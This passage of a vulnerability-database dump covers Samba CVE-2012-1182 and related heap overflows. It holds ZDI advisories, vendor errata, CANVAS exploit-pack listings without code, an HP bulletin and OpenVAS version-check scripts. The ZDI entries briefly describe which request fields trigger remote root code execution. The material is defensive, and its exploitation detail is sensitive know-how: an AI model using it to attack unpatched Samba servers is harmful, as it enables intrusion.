"2012-11-09T00:00:00", "published": "2012-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-071", "id": "ZDI-12-071", "title": "Samba ndr_ValidatePassword heap overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:52", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the way Samba handles lsa_LookupNames requests. When parsing the data send in the request Samba uses the field 'names' to create a heap allocation but then uses another field, 'num_names', to write data to the allocation. Because there is no check to see if 'num_names' is smaller than 'names' this could result in a heap buffer overflow that could lead to remote code execution.", "modified": "2012-11-09T00:00:00", "published": "2012-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-070", "id": "ZDI-12-070", "title": "Samba lsa_LookupNames Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:46", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within Samba's handling of a NDR PULL LSA TrustDomainInfoControllers request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-11-09T00:00:00", "published": "2012-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-062", "id": "ZDI-12-062", "title": "Samba NDR PULL LSA TrustDomainInfoControllers Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:12", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within Samba's handling of a NDR PULL SVCCTL StartServiceW request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-11-09T00:00:00", "published": "2012-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-063", "id": "ZDI-12-063", "title": "Samba NDR PULL SVCCTL StartServiceW Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:04", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within Samba's handling of a NDR PULL DFS EnumArray1 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-11-09T00:00:00", "published": "2012-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-064", "id": "ZDI-12-064", "title": "Samba NDR PULL DFS EnumArray1 Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2018-06-06T20:24:30", "published": "2012-04-10T04:00:00", "id": "RHSA-2012:0465", "href": "https://access.redhat.com/errata/RHSA-2012:0465", "type": "redhat", "title": "(RHSA-2012:0465) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:48", "bulletinFamily": "unix", "description": "The openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls. With\nthis update, the code has been generated with an updated version of PIDL to\ncorrect this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which\nprovides a number of bug fixes and enhancements over the previous version,\nincluding support for the rebased samba4 packages and several API changes.\n(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs:\n\n* When the user tried to modify a meeting with one required attendee and\nhimself as the organizer, a segmentation fault occurred in the memcpy()\nfunction. Consequently, the evolution-data-server application terminated\nunexpectedly with a segmentation fault. This bug has been fixed and\nevolution-data-server no longer crashes in the described scenario.\n(BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with\na large message body or with extensive attachment. This was caused by minor\nissues in OpenChange's exchange.idl definitions. This bug has been fixed\nand OpenChange now sends extensive messages without complications.\n(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n", "modified": "2018-06-06T20:24:22", "published": "2013-02-21T05:00:00", "id": "RHSA-2013:0515", "href": "https://access.redhat.com/errata/RHSA-2013:0515", "type": "redhat", "title": "(RHSA-2013:0515) Moderate: openchange security, bug fix and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:24", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T11:50:23", "published": "2012-04-10T04:00:00", "id": "RHSA-2012:0466", "href": "https://access.redhat.com/errata/RHSA-2012:0466", "type": "redhat", "title": "(RHSA-2012:0466) Critical: samba3x security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:47", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T11:49:10", "published": "2012-04-13T04:00:00", "id": "RHSA-2012:0478", "href": "https://access.redhat.com/errata/RHSA-2012:0478", "type": "redhat", "title": "(RHSA-2012:0478) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:54", "bulletinFamily": "unix", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, improved interoperability with Active Directory (AD)\ndomains. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n", "modified": "2018-06-06T20:24:36", "published": "2013-02-21T05:00:00", "id": "RHSA-2013:0506", "href": "https://access.redhat.com/errata/RHSA-2013:0506", "type": "redhat", "title": "(RHSA-2013:0506) Moderate: samba4 security, bug fix and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:51", "bulletinFamily": "unix", "description": "\nSamba development team reports:\n\nSamba versions 3.6.3 and all versions previous to this\n\t are affected by a vulnerability that allows remote code\n\t execution as the \"root\" user from an anonymous connection.\nAs this does not require an authenticated connection it\n\t is the most serious vulnerability possible in a program,\n\t and users and vendors are encouraged to patch their Samba\n\t installations immediately.\n\n", "modified": "2012-04-10T00:00:00", "published": "2012-04-10T00:00:00", "id": "BAF37CD2-8351-11E1-894E-00215C6A37BB", "href": "https://vuxml.freebsd.org/freebsd/baf37cd2-8351-11e1-894e-00215c6a37bb.html", "title": "samba -- \"root\" credential remote code execution", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:22", "bulletinFamily": "exploit", "description": "**Name**| CVE_2012_1182 \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182 \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate Public: 04/10/2012 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-CVE-2012-1182 \nCVSS: 0.0 \n\n", "modified": "2012-04-10T21:55:00", "published": "2012-04-10T21:55:00", "id": "CVE_2012_1182", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182", "title": "Immunity Canvas: CVE_2012_1182", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-25T14:13:35", "bulletinFamily": "exploit", "description": "**Name**| CVE_2012_1182_NONX \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182-NONX \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate public: 04/10/2012 \nCVE Url: N/A \nCVSS: 0.0 \n\n", "modified": "2012-04-10T17:55:02", "published": "2012-04-10T17:55:02", "id": "CVE_2012_1182_NONX", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182_NONX", "type": "canvas", "title": "Immunity Canvas: CVE_2012_1182_NONX", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:46:06", "bulletinFamily": "unix", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bugs have been fixed:\n\n * Samba printer name marshalling problems (bnc#722663)\n * mount.cifs: properly update mtab during remount\n (bnc#747906)\n * s3: compile IDL files in autogen, some configure\n tests need this.\n * Fix incorrect types in the full audit VFS module. Add\n null terminators to audit log enums (bnc#742885)\n * Do not map POSIX execute permission to Windows\n FILE_READ_ATTRIBUTES; (bso#8631); (bnc#732572).\n", "modified": "2012-04-14T10:08:18", "published": "2012-04-14T10:08:18", "id": "SUSE-SU-2012:0500-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00006.html", "type": "suse", "title": "Security update for Samba (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:22", "bulletinFamily": "unix", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bug has been fixed:\n\n * mount.cifs: Properly update mtab during remount;\n (bnc#747906).\n", "modified": "2012-04-14T14:08:17", "published": "2012-04-14T14:08:17", "id": "SUSE-SU-2012:0504-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00009.html", "title": "Security update for Samba (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:36", "bulletinFamily": "unix", "description": "Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n --changelog samba) for more details of the version update.\n\n", "modified": "2012-04-16T16:08:12", "published": "2012-04-16T16:08:12", "id": "OPENSUSE-SU-2012:0508-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00012.html", "type": "suse", "title": "update for samba (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:36:14", "bulletinFamily": "unix", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "modified": "2012-04-14T10:08:19", "published": "2012-04-14T10:08:19", "id": "SUSE-SU-2012:0501-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00007.html", "type": "suse", "title": "Security update for Samba (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:46", "bulletinFamily": "unix", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "modified": "2012-04-14T14:08:19", "published": "2012-04-14T14:08:19", "id": "SUSE-SU-2012:0501-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00010.html", "title": "Security update for Samba (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "description": "Array index overflow on RPC request processing.", "modified": "2012-04-19T00:00:00", "published": "2012-04-19T00:00:00", "id": "SECURITYVULNS:VULN:12328", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12328", "title": "Samba array index overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "description": "No description provided", "modified": "2012-06-17T00:00:00", "published": "2012-06-17T00:00:00", "id": "SECURITYVULNS:VULN:12426", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12426", "title": "HP Server Automation code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03366886\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03366886\r\nVersion: 1\r\n\r\nHPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2012-06-11\r\nLast Updated: 2012-06-11\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Server\r\nAutomation for Linux and SunOS. This vulnerability could by exploited\r\nremotely resulting in the execution of arbitrary code. The vulnerability is\r\nin Samba which is used in HP Server Automation.\r\n\r\nReferences: CVE-2012-1182\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Server Automation v7.8x, v9.0x, v9.1x on RedHat Linux, Suse Linux, and\r\nSunOS\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2012-1182 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP Server Automation Patch SRVA_00127.tar.gz to resolve this\r\nissue. The patch is available on HP&#39;s SSO here:\r\nhttp://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_SRVA_00127\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; 11 June 2012 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2012 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAk/V+3oACgkQ4B86/C0qfVnNIwCdHLlLQQANRVn3NY7HPMQvo5Y0\r\n3AgAoI1Jvj4NXs1QOB0oshhDlFuDsizm\r\n=3sLX\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2012-06-17T00:00:00", "published": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28165", "title": "[security bulletin] HPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-01-06T13:07:07", "bulletinFamily": "scanner", "description": "Check for the Version of samba4", "modified": "2018-01-05T00:00:00", "published": "2012-05-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864213", "id": "OPENVAS:864213", "title": "Fedora Update for samba4 FEDORA-2012-6349", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6349\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"samba4 on Fedora 15\";\ntag_insight = \"Samba 4 is the ambitious next version of the Samba suite that is being\n developed in parallel to the stable 3.0 series. The main emphasis in\n this branch is support for the Active Directory logon protocols used\n by Windows 2000 and above.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079715.html\");\n script_id(864213);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-04 10:46:43 +0530 (Fri, 04 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-6349\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6349\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~26.alpha11.fc15.6\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:1361412562310870935", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870935", "title": "RedHat Update for samba4 RHSA-2013:0506-02", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba4 RHSA-2013:0506-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00049.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870935\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:23 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0506-02\");\n script_name(\"RedHat Update for samba4 RHSA-2013:0506-02\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"samba4 on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n\n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is 